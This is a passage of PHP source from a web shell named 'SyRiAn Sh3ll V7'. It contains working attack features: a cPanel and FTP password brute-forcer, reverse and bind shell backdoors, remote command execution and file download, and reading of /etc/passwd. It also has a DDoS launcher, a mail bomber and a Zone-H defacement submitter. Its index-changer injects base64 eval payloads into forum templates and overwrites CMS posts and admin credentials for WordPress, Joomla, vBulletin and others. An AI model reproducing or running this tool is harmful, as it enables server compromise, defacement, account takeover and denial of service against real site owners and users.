2021 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
2022 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
2023 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
2024 $data = curl_exec($ch);
2025 if ( curl_errno($ch) == 28 )
2026 {
2027 print "[-] Connection Timeout Please Check The Target Hostname .";
2028 exit;
2029 }
2030 elseif ( curl_errno($ch) == 0 )
2031 {
2032 print "[+] Cracking Success With Username ($user) and Password ($pass)";
2033 }
2034 curl_close($ch);
2035 }
2036 if(isset($submit) && !empty($submit))
2037 {
2038 if(empty($users) && empty($pass))
2039 {
2040 print "[-] Please Check The Users or Password List Entry . . .";
2041 }
2042 if(empty($users))
2043 {
2044 print "[-] Please Check The Users List Entry . . .";
2045 }
2046 if(empty($pass))
2047 {
2048 print "[-] Please Check The Password List Entry . . ";
2049 }
2050 $userlist=explode("\n",$users);
2051 $passlist=explode("\n",$pass);
2052 print "[~]# Cracking Process Started, Please Wait ...";
2053 foreach ($userlist as $user)
2054 {
2055 $pureuser = trim($user);
2056 foreach ($passlist as $password )
2057 {
2058 $purepass = trim($password);
2059 if($cracktype == "ftp")
2060 {
2061 ftp_check($target,$pureuser,$purepass,$connect_timeout);
2062 }
2063 if ($cracktype == "cpanel")
2064 {
2065 cpanel_check($target,$pureuser,$purepass,$connect_timeout);
2066 }
2067 }
2068 }
2069 }
2070 }
2071 # --------------------------
2072 # Back Connection
2073 #---------------------------
2074 else if($_POST['backconn'])
2075 {
2076 if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
2077 {
2078 $ip = trim($_POST['ip']);
2079 $port = trim($_POST['backport']);
2080 tulis("bcc.c",$back_connect_c);
2081 Exe('gcc -o bcc bcc.c');
2082 Exe('chmod 777 bcc');
2083 @unlink('bcc.c');
2084 Exe("./bcc ".$ip." ".$port." &");
2085 $msg = "Now script try connect to ".$ip." port ".$port." ...";
2086 }
2087 elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
2088 {
2089 $ip = trim($_POST['ip']);
2090 $port = trim($_POST['backport']);
2091 tulis("bcp",$back_connect);
2092 Exe("chmod +x bcp");
2093 $p2=which("perl");
2094 Exe($p2." bcp ".$ip." ".$port." &");
2095 $msg = "Now script try connect to ".$ip." port ".$port." ...";
2096 }
2097 }
2098 # --------------------------
2099 # Bind Connection
2100 #---------------------------
2101 else if($_POST['bind'])
2102 {
2103 if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
2104 {
2105 $port = trim($_POST['port']);
2106 $passwrd = trim($_POST['bind_pass']);
2107 tulis("bdc.c",$port_bind_bd_c);
2108 Exe('gcc -o bdc bdc.c');
2109 Exe('chmod 777 bdc');
2110 @unlink("bdc.c");
2111 Exe("./bdc ".$port." ".$passwrd." &");
2112 $scan = Exe("ps aux");
2113 if(eregi("./bdc $por",$scan))
2114 {
2115 $msg = "Process found running, backdoor setup successfully.";
2116 }
2117 else
2118 {
2119 $msg = "Process not found running, backdoor not setup successfully.";
2120 }
2121 }
2122
2123 elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
2124 {
2125 $port = trim($_POST['port']);
2126 $passwrd = trim($_POST['bind_pass']);
2127 tulis("bdp",$port_bind_bd_pl);
2128 Exe("chmod 777 bdp");
2129 $p2=which("perl");
2130 Exe($p2." bdp ".$port." &");
2131 $scan = Exe("ps aux");
2132 if(eregi("$p2 bdp $port",$scan))
2133 {
2134 $msg = "Process found running, backdoor setup successfully.";
2135 }
2136 else
2137 {
2138 $msg = "Process not found running, backdoor not setup successfully.";
2139 }
2140 }
2141 }
2142
2143
2144 echo "</textarea>";
2145 if($_POST['editFileSubmit'])
2146 {
2147 echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
2148 echo "<input type='submit' value='Save' name='saveEditedFile'>";
2149 }
2150 echo "</form>
2151
2152 <!-- Main Table -->
2153 <table width='100%'><tr>
2154 <td width='30%' height=30>
2155 <!-- End Of Main Table -->
2156 <!-- Commands Alias-->
2157 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2158 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2159 <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
2160
2161name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
2162 <!-- End Of Commands Alias-->
2163 </td>
2164 <td width='30%' height=30>
2165 <!-- Command Line -->
2166 <form method='POST'>
2167 <table width='100%' height='72' border='0' id='Box'><tr>
2168 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2169 <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
2170 <input type='text' name='cmd' id='commandLine' value='dir' size=59>
2171 <input type='text' name='directory' value=".getcwd()." size=59>
2172 <input name='Execute' id='Execute' type='submit' value='Execute' >
2173 </td></tr></table></form>
2174 <!-- End Of Command Line -->
2175 </td>
2176 <td width='30%' height=30>
2177 <!-- Edit File -->
2178 <form method=POST>
2179 <table width='100%' height='72' border='0' id='Box'><tr>
2180 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2181 <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
2182 <input type='text' name='editFile' size=59>
2183 <input name='editFileSubmit' type='submit' value='Edit'>
2184 </td></tr></table></form>
2185 <!-- End Of Edit File -->
2186 </td>
2187 </tr>
2188 <tr>
2189 <td width='30%'>
2190 <!-- Chmod Force -->
2191 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2192 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2193 <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
2194 <input type='text' name='fileName' value='index.php' size=48>
2195 <br/><input type='text' name='per' value='0644' size='10'>
2196 <input type=submit value='Change Now !' name='changePermission'>
2197 </td></tr></table></form>
2198 <!-- End Of Chmod Force -->
2199 </td>
2200 <td>
2201 <!-- Get File -->
2202 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2203 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2204 <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
2205 <input type='text' name='fileUrl' size='59' value='http://www.'>
2206 <select name=getType>
2207 <option value=wget>wget</option>
2208 <option value='curl -o'>curl -o</option>
2209 <option value=get>get</option>
2210 <option value='lynx -source'>lynx -source</option>
2211 </select>
2212 <input name=getFile type=submit value='Get File' >
2213 </td></tr></table></form>
2214 <!-- End Of Get File -->
2215 </td>
2216 <td>
2217 <!-- Bind Connection -->
2218 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2219 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2220 <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
2221 <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
2222 <input type='text' name='port' size='26' value='443'>
2223 <select class='inputz' size='1' name='use'>
2224 <option value='Perl'>Perl</option><option value='C'>C</option>
2225 </select>
2226 <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
2227 </td></tr></table></form>
2228 <!-- End Of Bind Connection -->
2229 </td>
2230 </tr>
2231 <tr>
2232 <td>
2233 <!-- CGI perl -->
2234 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2235 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2236 <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
2237 <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
2238 <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
2239 <!-- End Of CGI perl -->
2240 </td><td>
2241 <!-- Forbidden -->
2242 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2243 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2244 <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
2245 <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
2246 <select name='403'>
2247 <option value='DirectoryIndex'>DirectoryIndex</option>
2248 <option value='HeaderName'>HeaderName</option>
2249 <option value='TXT'>TXT</option>
2250 <option value='404'>404</option>
2251 <option value='ReadmeName'>ReadmeName</option>
2252 <option value='footerName'>footerName</option>
2253 </select>
2254 <input type='submit' value='Generate' name='generateForbidden'>
2255 </td></tr></table></form>
2256 <!-- End Of Forbidden -->
2257 </td>
2258 <td>
2259 <!-- Back Connection -->
2260 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2261 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2262 <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
2263 <input type='text' name='ip' size='26' value='".GetRealIP()."'>
2264 <input type='text' name='backport' size='26' value='443'>
2265 <select name='use'>
2266 <option value='Perl'>Perl</option>
2267 <option value='C'>C</option>
2268 </select>
2269 <input type='submit' name='backconn' value='Connect'>
2270 </td></tr></table></form>
2271 <!-- End Of Back Connection -->
2272 </td>
2273 </tr>
2274 <tr>
2275 <td>
2276 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2277 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2278 <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
2279 <input type='text' name='hashToAnalyze' size=60>
2280 <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
2281 </td>
2282 <td>
2283 <!-- Eval Code -->
2284 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2285 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2286 <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
2287 <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
2288 <input type=submit name=submitEval value=Eval></td></tr></table></form>
2289 <!-- End Of Eval Code -->
2290 </td>
2291 <td>
2292 <!-- Users & Domains -->
2293 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2294 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2295 <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
2296 <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
2297 <input type='submit' name='GenerateUsers' Value='Generate'>
2298 <!-- End Of Users & Domains -->
2299 </td></tr></table></form>
2300 </td>
2301 </tr>
2302 <tr>
2303 <td>
2304 <!-- Reading Files -->
2305 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2306 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2307 <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
2308 <input type='text' value='/etc/passwd' name='file' size=35>
2309 <input class='buttons' type='submit' name='read' value='Read File'>
2310 <input class='buttons' type='submit' name='show' value='Show directory'>
2311 </td></tr></table></form>
2312 <!-- End Of Reading Files -->
2313 </td>
2314 <td>
2315 <!--Encryption -->
2316 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2317 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2318 <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
2319 <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
2320 <input type='submit' value='Encrypt' name='encryptNow'>
2321 </td></tr></table></form>
2322 <!-- End Of Encryption -->
2323 </td>
2324 <td>
2325 <!-- Metasploit RC -->
2326 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2327 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2328 <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
2329 <input type='text' size='15' name='ip' value='127.0.0.1'>
2330 <input type='text' size='5' name='port' value='443'>
2331 <input type='submit' value='Connect' name='metaConnect'>
2332 </td></tr></table></form>
2333 <!-- End Of Metasploit RC -->
2334 </td>
2335 </tr>
2336 <tr>
2337 <td>
2338 <!-- DDOS Attacker -->
2339 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2340 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2341 <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
2342 <input type='text' name='ipToAttack' size='40' value='Target IP'>
2343 <input type='text' name='portToAttack' size='20' value='Target PORT'>
2344 <input type='submit' name='StartAttack' value='Attack'>
2345 </td></tr></table></form>
2346 <!-- End Of DDOS Attacker -->
2347 </td>
2348 <td>
2349 <!-- Ports Scanner -->
2350 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2351 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2352 <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
2353 <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
2354 </td></tr></table></form>
2355 <!-- End Of Ports Scanner -->
2356 </td>
2357 <td>
2358 <!-- ACP Finder -->
2359 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2360 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2361 <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
2362 <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
2363 <input type='text' value='.php' name='extention'/>
2364 <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
2365 <!-- End Of ACP Finder -->
2366 </td></tr></table></form>
2367 </td>
2368 </tr>
2369
2370 <tr>
2371 <br>
2372 <td valign='top'>
2373 <!-- Server ShortCut -->
2374 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2375 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2376 <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
2377 <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
2378 <input type='submit' name='generateSER' value=' Generate '>
2379 </td></tr></table></form>
2380 <!-- End Of Server ShoutCut -->
2381 </td>
2382 <td valign='top'>
2383 <!-- Fast Tools -->
2384 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2385 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2386 <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
2387 <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
2388 <input type=submit value='Generate php.ini' name='phpiniGenerate'>
2389 <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
2390 <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
2391 <input type='submit' name='showUsers' value='Show Users' />
2392 </td></tr></table></form>
2393 <!-- End Of Fast Tools -->
2394 </td>
2395 <td valign='TOP'>
2396 <!-- SQL Reader -->
2397 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2398 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2399 <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
2400 <input type='text' value='/etc/passwd' name='file' size='35'><br/>
2401 <input type='text' name='host' value='127.0.0.1'>
2402 <input type='text' name='user' value='DB user'>
2403 <input type='text' name='pass' value='DB pass'>
2404 <input type=text name='db' value='DB name'>
2405 <input type='submit' name='sql2Read' value='Read'>
2406 ";
2407 if($sql_con)
2408 {
2409 echo '<input style="width:300px;" type="text" name="filetoread">
2410 <input type="submit" value="Read" name="SQLToRead">';
2411 }
2412 echo "</td></tr></table></form>
2413 <!-- End Of SQL Reader -->
2414 </td>
2415 </tr>
2416 <tr>
2417 <td valign='top'>
2418 <!-- Mail Storm -->
2419 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2420 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2421 <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
2422 <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
2423 <input type='text' name='to' value='Target Email' >
2424 <input type='text' size='5' name='nom' value='100'>
2425 <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
2426 </td></tr></table></form>
2427 <!-- End Of Mail Storm -->
2428 </td>
2429 <td valign='top'>
2430 <!-- SQL Query -->
2431 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2432 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2433 <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
2434 <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
2435 <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
2436 <input type = 'text' name=\"QU_PASS\" value='DB Pass'>
2437 <input type=text name=\"QU_DB\" value='DB Name' >
2438 <textarea name='QU' rows=2 cols=50>SELECT * FROM emp ;</textarea>
2439 <input name='MySQLQuery' type='submit'>
2440 </td></tr></table></form>
2441 <!-- SQL Query -->
2442 </td>
2443 <td valign='top'>
2444 <!-- Email Extractor -->
2445 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2446 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2447 <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
2448 <input type = 'text' name='EM_HOST' value='127.0.0.1'>
2449 <input type='text' name='EM_USER' value='DB user'>
2450 <input type ='text' name='EM_PASS' value='DB pass'>
2451 <input type='text' name='EM_DB' value='DB name'>
2452 <input type ='text' name='EM_TABLE' value='users Table'>
2453 <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
2454 <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
2455 <input type='submit' value='?' name='emailExtractorHelp' alt='Email Extractor Help'/>
2456 </td></tr></table></form>
2457 <!-- End Of Email Extractor -->
2458 </td>
2459 </tr>
2460 <tr>
2461 <td valign='top'>
2462 <!-- Zone-H -->
2463 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2464 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2465 <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
2466 echo '<form action="" method="post">
2467<input type="text" name="defacer" size="40" value="Attacker" />
2468<select name="hackmode">
2469<option >--------SELECT--------</option>
2470<option value="1">known vulnerability (i.e. unpatched system)</option>
2471<option value="2" >undisclosed (new) vulnerability</option>
2472<option value="3" >configuration / admin. mistake</option>
2473<option value="4" >brute force attack</option>
2474<option value="5" >social engineering</option>
2475<option value="6" >Web Server intrusion</option>
2476<option value="7" >Web Server external module intrusion</option>
2477<option value="8" >Mail Server intrusion</option>
2478<option value="9" >FTP Server intrusion</option>
2479<option value="10" >SSH Server intrusion</option>
2480<option value="11" >Telnet Server intrusion</option>
2481<option value="12" >RPC Server intrusion</option>
2482<option value="13" >Shares misconfiguration</option>
2483<option value="14" >Other Server intrusion</option>
2484<option value="15" >SQL Injection</option>
2485<option value="16" >URL Poisoning</option>
2486<option value="17" >File Inclusion</option>
2487<option value="18" >Other Web Application bug</option>
2488<option value="19" >Remote administrative panel access bruteforcing</option>
2489<option value="20" >Remote administrative panel access password guessing</option>
2490<option value="21" >Remote administrative panel access social engineering</option>
2491<option value="22" >Attack against administrator(password stealing/sniffing)</option>
2492<option value="23" >Access credentials through Man In the Middle attack</option>
2493<option value="24" >Remote service password guessing</option>
2494<option value="25" >Remote service password bruteforce</option>
2495<option value="26" >Rerouting after attacking the Firewall</option>
2496<option value="27" >Rerouting after attacking the Router</option>
2497<option value="28" >DNS attack through social engineering</option>
2498<option value="29" >DNS attack through cache poisoning</option>
2499<option value="30" >Not available</option>
2500</select>
2501
2502<select name="reason">
2503<option >--------SELECT--------</option>
2504<option value="1" >Heh...just for fun!</option>
2505<option value="2" >Revenge against that website</option>
2506<option value="3" >Political reasons</option>
2507<option value="4" >As a challenge</option>
2508<option value="5" >I just want to be the best defacer</option>
2509<option value="6" >Patriotism</option>
2510<option value="7" >Not available</option>
2511</select>
2512<textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
2513<input type="submit" value="Send Now !" name="SendNowToZoneH" />
2514</form>';
2515 echo "</td></tr></table></form>
2516 <!-- End Of Zone-H -->
2517 </td>
2518 <td valign='top'>
2519 <!-- Cpanel And FTP BruteForce Attacker -->
2520 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2521 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2522 <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
2523 <textarea rows='12' name='users' cols='23' >";
2524 @system('ls /var/mail');
2525 echo "</textarea>
2526 <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$
2527
2528%^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
2529 </textarea>
2530 <input type='text' name='target' size='16' value='127.0.0.1' >
2531 <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
2532 <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
2533 <input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' >
2534 </td></tr></table></form>
2535 <!-- End Of Cpanel And FTP BruteForce Attacker -->
2536 </td>
2537 <td valign='top'>
2538 <!-- Upload Files -->
2539 <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0' id='Box'><tr>
2540 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2541 <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
2542 <input type=\"file\" name=\"uploadfile[]\">
2543 <input type=\"file\" name=\"uploadfile[]\">
2544 <input type=\"file\" name=\"uploadfile[]\">
2545 <input type=\"file\" name=\"uploadfile[]\">
2546 <input type=\"file\" name=\"uploadfile[]\">
2547 <input type=\"file\" name=\"uploadfile[]\">
2548 <input type=\"file\" name=\"uploadfile[]\">
2549 <input type=\"file\" name=\"uploadfile[]\">
2550 <input type=\"file\" name=\"uploadfile[]\">
2551 <input type=\"file\" name=\"uploadfile[]\">
2552 <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
2553 </td></tr></table></form>
2554 <!-- End Of Upload Files -->
2555 </td></tr>
2556 </table>
2557 ";
2558 if($_POST['changeDirectory'])
2559 {
2560 $directory = $_POST['directory'];
2561 $directory = @str_replace("\\\\"," ",$directory);
2562 $directory = @str_replace(" ","\\",$directory);
2563 @chdir($directory);
2564 }
2565 if($_POST['getFile'])
2566 {
2567 $fileUrl = $_POST['fileUrl'];
2568 $getType = $_POST['getType'];
2569 Exe("'".$getType.$fileUrl."'");
2570 }
2571footer();
2572}
2573# ---------------------------------------#
2574# IndexChanger #
2575#----------------------------------------#
2576if ($_GET['id']== 'scriptsHack' )
2577{
2578 echo "
2579 <table width='100%'>
2580 <tr>
2581 <td colspan='2'><textarea cols='153' rows='10'>";
2582 if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
2583 {
2584 $host = $_POST['HOST'];
2585 $user = $_POST['USER'];
2586 $pass = $_POST['PASS'];
2587 $db = $_POST['DB'];
2588 $index = $_POST['INDEX'];
2589 $prefix = $_POST['PREFIX'];
2590 if (empty($_POST['HOST']))
2591 $host = '127.0.0.1';
2592 $index=str_replace("\'","'",$index);
2593 @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
2594 @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
2595
2596 if($_POST['UpdateIndex'])
2597 {
2598 if ($_POST['ScriptType'] == 'vb')
2599 {
2600 $full_index = "{\${eval(base64_decode(\'";
2601 $full_index .= base64_encode("echo \"$index\";");
2602 $full_index .= "\'))}}{\${exit()}}</textarea>";
2603 if($_POST['injectFAQ'])
2604 {
2605 $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
2606 }
2607 else
2608 {
2609 $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
2610 if (!$ok1)
2611 {
2612 $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
2613 }
2614 elseif (!$ok2)
2615 {
2616 $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
2617 }
2618 elseif(!$ok3)
2619 {
2620 $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
2621 }
2622 }
2623 mysql_close();
2624 if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
2625 {
2626 update();
2627 }
2628 else
2629 {
2630 echo "Updating Has Failed !";
2631 }
2632 }
2633 else if ($_POST['ScriptType'] == 'wp')
2634 {
2635 $tableName = $prefix."posts" ;
2636 $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
2637 if(!$ok1)
2638 {
2639 $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
2640 }
2641 elseif(!$ok2)
2642 {
2643 $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
2644 }
2645 mysql_close();
2646 if ($ok1 || $ok2 || $ok3)
2647 {
2648 update();
2649 }
2650 else
2651 {
2652 echo "Updating Has Failed !";
2653 }
2654 }
2655 else if ($_POST['ScriptType'] == 'jos')
2656 {
2657 $jos_table_name = $prefix."menu" ;
2658 $jos_table_name2 = $prefix."modules" ;
2659 $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
2660 if(!$ok1)
2661 {
2662 $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
2663 }
2664 mysql_close();
2665 if ($ok1 || $ok2 || $ok3)
2666 {
2667 update();
2668 }
2669 else
2670 {
2671 echo "Updating Has Failed !";
2672 }
2673 }
2674 else if ($_POST['ScriptType'] == 'phpbb')
2675 {
2676 $php_table_name = $prefix."forums";
2677 $php_table_name2 = $prefix."posts";
2678 $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
2679 if(!$ok1)
2680 {
2681 $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
2682 }
2683 mysql_close();
2684 if ($ok1 || $ok2 || $ok3)
2685 {
2686 update();
2687 }
2688 else
2689 {
2690 echo "Updating Has Failed !";
2691 }
2692 }
2693 else if ($_POST['ScriptType'] == 'ipb')
2694 {
2695 $ip_table_name = $prefix."components" ;
2696 $ip_table_name2 = $prefix."forums" ;
2697 $ip_table_name3 = $prefix."posts" ;
2698 $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
2699 if(!$ok1)
2700 {
2701 $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0");
2702 }
2703 if(!$ok2)
2704 {
2705 $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates
2706
2707!!");
2708 }
2709 mysql_close();
2710 if ($ok1 || $ok2 || $ok3)
2711 {
2712 update();
2713 }
2714 else
2715 {
2716 echo "Updating Has Failed !";
2717 }
2718 }
2719 else if ($_POST['ScriptType'] == 'smf')
2720 {
2721 $table_name = $prefix."boards" ;
2722 {
2723 $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
2724 }
2725 if(!$ok1)
2726 {
2727 $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
2728 }
2729 mysql_close();
2730 if ($ok1 || $ok2)
2731 {
2732 update();
2733 }
2734 else
2735 {
2736 echo "Updating Has Failed !";
2737 }
2738 }
2739 else if ($_POST['ScriptType'] == 'mybb')
2740 {
2741 $mybb_prefix = $prefix."templates";
2742 $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
2743 if ($ok1)
2744 {
2745 update();
2746 }
2747 else
2748 {
2749 echo "Updating Has Failed !";
2750 }
2751 mysql_close();
2752 }
2753 }
2754 elseif($_POST['changeInfo'])
2755 {
2756 $adminID = $_POST['adminID'];
2757 $userName = $_POST['userName'];
2758 $password = $_POST['password'];
2759 if($_POST['ScriptType'] == 'vb')
2760 {
2761 //VB Code
2762 $password = md5($password);
2763 $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".
2764
2765$adminID."");
2766 if($tryChaningInfo)
2767 {update();}
2768 else {mysql_error();}
2769 }
2770 else if($_POST['ScriptType'] == 'wp')
2771 {
2772 //WoredPress
2773 $password = crypt($password);
2774 $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID
2775
2776= ".$adminID."");
2777 if($tryChaningInfo)
2778 {update();}
2779 else {mysql_error();}
2780 }
2781 else if($_POST['ScriptType'] == 'jos')
2782 {
2783 //Joomla
2784 $password = crypt($password);
2785 $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID =
2786
2787".$adminID."");
2788 if($tryChaningInfo)
2789 {update();}
2790 else {mysql_error();}
2791 }
